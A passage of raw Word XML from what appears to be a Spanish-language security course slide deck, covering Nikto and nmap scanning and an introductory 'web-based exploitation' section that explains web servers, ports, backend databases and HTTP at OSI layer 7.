          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Para comprender el proceso de escaneo de vulnerabilidades, también se puede usar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>escaneo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>vulnerabilidades</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">(para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>aplicaciones</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> web) y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">(tanto para redes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> para aplicaciones web).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2221ECB6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId195"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:pgNumType w:start="107"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A82D97D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DE3BF1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="855"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60AE7AD8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB98B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720DB18A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15811584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EB75FDC" wp14:editId="5BE589CF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1304925"/>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04925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1304925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="423" name="Graphic 423"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1304925">
                                <a:moveTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1304544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="424" name="Textbox 424"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="23660D70" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="389"/>
                                <w:ind w:left="6578"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>3.2.4 Explotaci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="7EB75FDC" id="Group 422" o:spid="_x0000_s1216" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:102.75pt;z-index:15811584;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="12192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">
                <v:shape id="Graphic 423" o:spid="_x0000_s1217" style="position:absolute;width:121920;height:13049;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m,1304544r12192000,l12192000,,,,,1304544xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 424" o:spid="_x0000_s1218" type="#_x0000_t202" style="position:absolute;width:121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23660D70" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="389"/>
                          <w:ind w:left="6578"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>3.2.4 Explotaci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1260E2E9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EDCE27" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="311"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230A68EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1364"/>
        </w:tabs>
        <w:jc w:val="left"/>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5396992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FE4B307" wp14:editId="53B4CB70">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>451408</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1103364</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2671445" cy="35560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355600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3048601D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="559" w:lineRule="exact"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="56"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="56"/>
                              </w:rPr>
                              <w:t>3.2.4 Explotación</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0FE4B307" id="Textbox 425" o:spid="_x0000_s1219" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:35.55pt;margin-top:-86.9pt;width:210.35pt;height:28pt;z-index:-1791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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3048601D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="559" w:lineRule="exact"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="56"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="56"/>
                        </w:rPr>
                        <w:t>3.2.4 Explotación</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Basado en la web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61679C11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1001"/>
        </w:tabs>
        <w:spacing w:before="549"/>
        <w:ind w:left="1001"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Una vez que se han identificado las vulnerabilidades/configuraciones incorrectas, se puede optar por la explotación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB27D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18936F7E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="912"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="849" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El servidor que aloja el sitio web se llama servidor web y, por lo general, escucha en el puerto TCP 80. En algunos casos, el servicio podría configurarse para ejecutarse en puertos distintos del predeterminado, como un pequeño paso hacia la seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B290432" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="303"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92E0B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="911"/>
        </w:tabs>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="911" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El cliente a través del navegador, se conecta al puerto y por lo tanto pueden comunicarse o transferir datos entre cada uno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C2706A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="912"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Otro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F805B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="334"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CBE179" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="912"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="2108" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Durante la comunicación, el servicio web responde proporcionando el contenido solicitado, como HTML, JavaScript, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895C490" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="301"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A2877A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="911"/>
        </w:tabs>
        <w:ind w:left="911" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El servidor web se comunicó con el servidor de la base de datos en el backend para obtener contenidos de la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3431E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="292" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6A676B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="948"/>
        </w:tabs>
        <w:spacing w:before="62" w:line="460" w:lineRule="exact"/>
        <w:ind w:left="948" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>El conjunto de reglas o protocolos utilizados para comunicarse entre el servidor y el cliente se ejecuta en la capa 7 en el OSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E562D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="949"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15812096" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59ED74DB" wp14:editId="05A8E85A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3183467</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
